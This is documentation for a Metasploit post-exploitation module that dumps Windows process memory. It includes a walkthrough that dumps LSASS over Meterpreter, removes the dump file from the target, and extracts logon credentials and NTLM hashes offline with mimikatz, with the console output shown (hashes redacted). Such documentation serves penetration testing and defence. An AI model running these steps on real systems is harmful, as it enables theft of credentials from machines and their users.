documentation/modules/post/windows/gather/memory_dump.md
This module dumps the memory for any process on the system and retrieves it for later analysis. The user must have sufficient permissions to read the memory of that process. Low-privilege users should be able to read any of their own processes. High-privilege users should be able to read any unprotected process.
This module only works on a Meterpreter session on Windows.
msfconsoleuse post/windows/gather/memory_dumpset SESSION <session id>set PID <process id> or set PROCESS_NAME <process name>set DUMP_PATH <path on remote system>set DUMP_TYPE <standard|full>runThe path that the memory dump will be temporarily stored at. This file is then
downloaded and deleted at the end of the run. This file should be in a writable
location, and should not already exist. If not specified, the dump is written
with a random filename in %TEMP%.
The ID of the process to dump. To find the PID, in your Meterpreter session,
type ps. To find a process by name, type ps | <process name>.
The name of the process(es) to dump. This will dump memory for all processes with this name.
Two options are provided for creating a memory dump:
This option retrieves the entire memory address space, including all DLLs, EXEs and memory mapped files. For dumping LSASS for offline analysis, this option seems to be preferable. However, the file size can be significantly larger than the Standard option.
This option retrieves most data from the process, with the exception of DLLs,
EXEs and memory mapped files. As a result, some analysis tools may have trouble
with automated analysis, however any sensitive information such as passwords
which are stored in memory should be part of this dump. This data could
possibly be retrieved using a tool such as strings. The file size should be
significantly smaller than the Full option.
Retrieving lsass (after getsystem)
meterpreter > ps | lsass
Filtering on 'lsass'
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
700 536 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
meterpreter >
Background session 4? [y/N]
msf post(windows/gather/memory_dump) > set pid 700
pid => 700
msf post(windows/gather/memory_dump) > run
[*] Running module against DemoPC
[*] Dumping memory for lsass.exe
[*] Downloading minidump (5.31 MiB)
[+] Memory dump stored at /home/user/.msf4/loot/20210505174955_default_192.168.XXX.XXX_windows.process._647943.bin
[*] Deleting minidump from disk
[*] Post module execution completed
Then in mimikatz (offline):
.#####. mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # sekurlsa::minidump c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin
Switch to MINIDUMP : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin'
mimikatz # sekurlsa::logonPasswords
Opening : 'c:\Users\user\desktop\20210505175519_default_192.168.XXX.XXX_windows.process._162777.bin' file for minidump...
Authentication Id : 0 ; 280858 (00000000:0004491a)
Session : RemoteInteractive from 2
User Name : user
Domain : DemoPC
Logon Server : DemoPC
Logon Time : 5/05/2021 3:15:10 PM
SID : S-1-5-21-920577323-754201681-977916534-1001
msv :
[00000003] Primary
* Username : user
* Domain : DemoPC
* NTLM : (redacted, but verified)
* SHA1 : (redacted)
tspkg :
wdigest :
* Username : user
* Domain : DemoPC
* Password : (null)
kerberos :
* Username : user
* Domain : DemoPC
* Password : (null)
ssp :
credman :
cloudap :